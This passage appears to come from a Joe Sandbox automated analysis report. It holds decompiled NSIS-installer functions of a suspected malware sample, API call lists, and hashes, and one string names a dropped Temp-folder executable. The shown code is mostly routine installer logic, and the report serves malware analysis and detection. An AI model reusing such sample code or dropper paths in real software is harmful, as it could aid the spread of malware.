                    0x0040595c
                    0x0040595c
                    0x00405970
                    0x00405970
                    0x00405984
                    0x0040598d
                    0x00405996
                    0x004059a6
                    0x004059b2
                    0x004059b2
                    0x00000000

                    APIs
                    • GetDlgItem.USER32 ref: 0040586D
                    • GetDlgItem.USER32 ref: 0040587C
                    • GetClientRect.USER32 ref: 004058B9
                    • GetSystemMetrics.USER32 ref: 004058C0
                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058E1
                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058F2
                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405905
                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405913
                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405926
                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405948
                    • ShowWindow.USER32(?,00000008), ref: 0040595C
                    • GetDlgItem.USER32 ref: 0040597D
                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040598D
                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A6
                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059B2
                    • GetDlgItem.USER32 ref: 0040588B
                      • Part of subcall function 004045FF: SendMessageW.USER32(00000028,?,00000001,0040442A), ref: 0040460D
                    • GetDlgItem.USER32 ref: 004059CF
                    • CreateThread.KERNEL32 ref: 004059DD
                    • CloseHandle.KERNEL32(00000000), ref: 004059E4
                    • ShowWindow.USER32(00000000), ref: 00405A08
                    • ShowWindow.USER32(?,00000008), ref: 00405A0D
                    • ShowWindow.USER32(00000008), ref: 00405A57
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A8B
                    • CreatePopupMenu.USER32 ref: 00405A9C
                    • AppendMenuW.USER32 ref: 00405AB0
                    • GetWindowRect.USER32 ref: 00405AD0
                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE9
                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B21
                    • OpenClipboard.USER32(00000000), ref: 00405B31
                    • EmptyClipboard.USER32 ref: 00405B37
                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B43
                    • GlobalLock.KERNEL32 ref: 00405B4D
                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B61
                    • GlobalUnlock.KERNEL32(00000000), ref: 00405B81
                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405B8C
                    • CloseClipboard.USER32 ref: 00405B92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                    • String ID: {
                    • API String ID: 590372296-366298937
                    • Opcode ID: a77729b42b97d1460badf31275b058d201800e7c8612f90bf0790785bfc588e5
                    • Instruction ID: f3bb878df23a29f955279a02cf148875578f9ab87112c8cbe183df0a3e5e7c84
                    • Opcode Fuzzy Hash: a77729b42b97d1460badf31275b058d201800e7c8612f90bf0790785bfc588e5
                    • Instruction Fuzzy Hash: 7DB16BB1900608FFDF119F64DD89AAE7B79FB45354F00802AFA41BA1A0CB785E51DF68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404ABB Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 78%
                    			E00404ABB(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x7a0f60;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x7a9000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CB2(0x3fb, _t146);
					E004068F5(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CB2(0x3fb, _t146);
							if(E00406045(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040666E(0x79ff58, _t146);
							_t87 = E00406A3B(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040666E(0x79ff58, _t146);
								_t89 = E00405FE8(0x79ff58);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x79ff58,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x79ff58) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x79ff58,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F89(0x79ff58);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x79ff58) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F58(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x7a7a7c + 0x10)) != _t158) {
									E00404F40(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x79ff48);
									} else {
										E00404E77(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x7a8b44 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045EC(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x7a1f78 == _t158) {
									E00404A14();
								}
								 *0x7a1f78 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x7a1f88;
							_v60 = E00404E11;
							_v56 = _t146;
							_v68 = E004066AB(_t146, 0x7a1f88, _t167, 0x7a0760, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F3D(_t146);
								_t125 =  *((intOrPtr*)( *0x7a8ab0 + 0x11c));
								if( *((intOrPtr*)( *0x7a8ab0 + 0x11c)) != 0 && _t146 == L"C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E004066AB(_t146, 0x7a1f88, _t167, 0, _t125);
									if(lstrcmpiW(0x7a6a40, 0x7a1f88) != 0) {
										lstrcatW(_t146, 0x7a6a40);
									}
								}
								 *0x7a1f78 =  *0x7a1f78 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FB4(_t146) != 0 && E00405FE8(_t146) == 0) {
						E00405F3D(_t146);
					}
					 *0x7a7a78 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045CA(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045CA(_t167);
					E004045FF(_t166);
					_t138 = E00406A3B(8);
					if(_t138 == 0) {
						L53:
						return E00404631(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                    0x00404abb
                    0x00404ac1
                    0x00404ac7
                    0x00404ad4
                    0x00404ae2
                    0x00404ae5
                    0x00404aed
                    0x00404af3
                    0x00404af3
                    0x00404aff
                    0x00404b02
                    0x00404b70
                    0x00404b77
                    0x00404c4e
                    0x00404c55
                    0x00404c64
                    0x00404c64
                    0x00404c68
                    0x00404c72
                    0x00404c7f
                    0x00404c81
                    0x00404c81
                    0x00404c8f
                    0x00404c96
                    0x00404c9d
                    0x00404ca0
                    0x00404cdc
                    0x00404cde
                    0x00404ce4
                    0x00404ce9
                    0x00404ced
                    0x00404cef
                    0x00404cef
                    0x00404d0b
                    0x00000000
                    0x00404d0d
                    0x00404d10
                    0x00404d1e
                    0x00404d24
                    0x00404d25
                    0x00404d28
                    0x00404d2b
                    0x00000000
                    0x00404d2b
                    0x00404ca2
                    0x00404ca4
                    0x00404ca8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404caa
                    0x00404caa
                    0x00404cb7
                    0x00404cbc
                    0x00000000
                    0x00000000
                    0x00404cc0
                    0x00404cc2
                    0x00404cc2
                    0x00404ccb
                    0x00404ccd
                    0x00404cd2
                    0x00404cd5
                    0x00404cda
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404cda
                    0x00404d37
                    0x00404d41
                    0x00404d44
                    0x00404d47
                    0x00404d4e
                    0x00404d4e
                    0x00404d50
                    0x00404d50
                    0x00404d55
                    0x00404d57
                    0x00404d5f
                    0x00404d66
                    0x00404d68
                    0x00404d73
                    0x00404d73
                    0x00404d68
                    0x00404d83
                    0x00404d8d
                    0x00404d95
                    0x00404db0
                    0x00404d97
                    0x00404da0
                    0x00404da0
                    0x00404d95
                    0x00404db5
                    0x00404dba
                    0x00404dbf
                    0x00404dc8
                    0x00404dc8
                    0x00404dd1
                    0x00404dd3
                    0x00404dd3
                    0x00404ddf
                    0x00404de7
                    0x00404df1
                    0x00404df1
                    0x00404df6
                    0x00000000
                    0x00404df6
                    0x00404ca0
                    0x00404c57
                    0x00404c5e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404c5e
                    0x00404b7d
                    0x00404b86
                    0x00404ba0
                    0x00404ba5
                    0x00404baf
                    0x00404bb6
                    0x00404bc2
                    0x00404bc5
                    0x00404bc8
                    0x00404bcf
                    0x00404bd7
                    0x00404bda
                    0x00404bde
                    0x00404be5
                    0x00404bed
                    0x00404c47
                    0x00404bef
                    0x00404bf0
                    0x00404bf7
                    0x00404c01
                    0x00404c09
                    0x00404c16
                    0x00404c2a
                    0x00404c2e
                    0x00404c2e
                    0x00404c2a
                    0x00404c33
                    0x00404c40
                    0x00404c40
                    0x00404bed
                    0x00000000
                    0x00404ba5
                    0x00404b93
                    0x00000000
                    0x00000000
                    0x00404b99
                    0x00000000
                    0x00404b04
                    0x00404b11
                    0x00404b1a
                    0x00404b27
                    0x00404b27
                    0x00404b2e
                    0x00404b34
                    0x00404b3d
                    0x00404b40
                    0x00404b43
                    0x00404b4b
                    0x00404b4e
                    0x00404b51
                    0x00404b57
                    0x00404b5e
                    0x00404b65
                    0x00404dfc
                    0x00404e0e
                    0x00404b6b
                    0x00404b6e
                    0x00000000
                    0x00404b6e
                    0x00404b65

                    APIs
                    • GetDlgItem.USER32 ref: 00404B0A
                    • SetWindowTextW.USER32(00000000,?), ref: 00404B34
                    • SHBrowseForFolderW.SHELL32(?), ref: 00404BE5
                    • CoTaskMemFree.OLE32(00000000), ref: 00404BF0
                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,007A1F88,00000000,?,?), ref: 00404C22
                    • lstrcatW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk), ref: 00404C2E
                    • SetDlgItemTextW.USER32 ref: 00404C40
                      • Part of subcall function 00405CB2: GetDlgItemTextW.USER32 ref: 00405CC5
                      • Part of subcall function 004068F5: CharNextW.USER32(?,*?|<>/":,00000000,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406958
                      • Part of subcall function 004068F5: CharNextW.USER32(?,?,?,00000000,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406967
                      • Part of subcall function 004068F5: CharNextW.USER32(?,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040696C
                      • Part of subcall function 004068F5: CharPrevW.USER32(?,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040697F
                    • GetDiskFreeSpaceW.KERNEL32(0079FF58,?,?,0000040F,?,0079FF58,0079FF58,?,00000001,0079FF58,?,?,000003FB,?), ref: 00404D03
                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D1E
                      • Part of subcall function 00404E77: lstrlenW.KERNEL32(007A1F88,007A1F88,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F18
                      • Part of subcall function 00404E77: wsprintfW.USER32 ref: 00404F21
                      • Part of subcall function 00404E77: SetDlgItemTextW.USER32 ref: 00404F34
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                    • String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk
                    • API String ID: 2624150263-1432775139
                    • Opcode ID: 1c3e24ea3c91ff4ce813832bee9d1a6c89b271b1ee61e594e0d9cbeb6062d674
                    • Instruction ID: 4ef08ca0e285fb36132dd1072a135484aded6f5102cec428142970bb06395e88
                    • Opcode Fuzzy Hash: 1c3e24ea3c91ff4ce813832bee9d1a6c89b271b1ee61e594e0d9cbeb6062d674
                    • Instruction Fuzzy Hash: 77A182B1901209ABEB11AFA5CD45AEF77B9EF84314F11803BF601B62D1DB7C89418B69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004021AA Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON
                    Download Yara Rule
                    C-Code - Quality: 67%
                    			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FB4( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x7b4000);
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                    0x004021b3
                    0x004021bd
                    0x004021c7
                    0x004021d1
                    0x004021dc
                    0x004021df
                    0x004021f9
                    0x004021fc
                    0x00402202
                    0x00402205
                    0x0040220f
                    0x00402213
                    0x00402213
                    0x00402218
                    0x00402229
                    0x00402231
                    0x004022e8
                    0x004022e8
                    0x004022ef
                    0x00402237
                    0x00402237
                    0x00402246
                    0x0040224a
                    0x0040224d
                    0x00402253
                    0x00402261
                    0x00402264
                    0x00402266
                    0x00402271
                    0x00402271
                    0x00402276
                    0x00402278
                    0x0040227f
                    0x0040227f
                    0x00402282
                    0x0040228b
                    0x0040228e
                    0x00402294
                    0x00402296
                    0x004022a0
                    0x004022a0
                    0x004022a3
                    0x004022ac
                    0x004022af
                    0x004022b8
                    0x004022be
                    0x004022c0
                    0x004022ce
                    0x004022ce
                    0x004022d1
                    0x004022d7
                    0x004022d7
                    0x004022da
                    0x004022e0
                    0x004022e6
                    0x004022fb
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004022e6
                    0x004022f1
                    0x00402c2d
                    0x00402c39

                    APIs
                    • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: CreateInstance
                    • String ID:
                    • API String ID: 542301482-0
                    • Opcode ID: 95206bf645e1c446277479694b40913283949515a1362953c4f2174f782b348b
                    • Instruction ID: c9e7058f2ccac2017f9d88f2873359e197591af4de9cbf84fabb751e216ccc72
                    • Opcode Fuzzy Hash: 95206bf645e1c446277479694b40913283949515a1362953c4f2174f782b348b
                    • Instruction Fuzzy Hash: A1411571A00209EFCF40DFE4C989E9D7BB5BF49304B2045AAF505EB2D1DB799981CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 39%
                    			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065B5( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E0040666E();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                    0x00402923
                    0x0040293e
                    0x00402949
                    0x0040294a
                    0x00402a94
                    0x00402925
                    0x00402928
                    0x0040292b
                    0x0040292e
                    0x0040292e
                    0x00402c2d
                    0x00402c39

                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: FileFindFirst
                    • String ID:
                    • API String ID: 1974802433-0
                    • Opcode ID: 886e1da82f87bd9a052d385c947725ec3f25a605ee36621127924a1c8a89904e
                    • Instruction ID: 9ced82c77f1422a0303d0e50afa4302c42ae01a582b6fde34da312f05d76664a
                    • Opcode Fuzzy Hash: 886e1da82f87bd9a052d385c947725ec3f25a605ee36621127924a1c8a89904e
                    • Instruction Fuzzy Hash: 5CF05E71904104EAD701DBA4E949AAEB378EF15314F20457BE101F21D0EBB88E119B29
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405037 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 96%
                    			E00405037(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
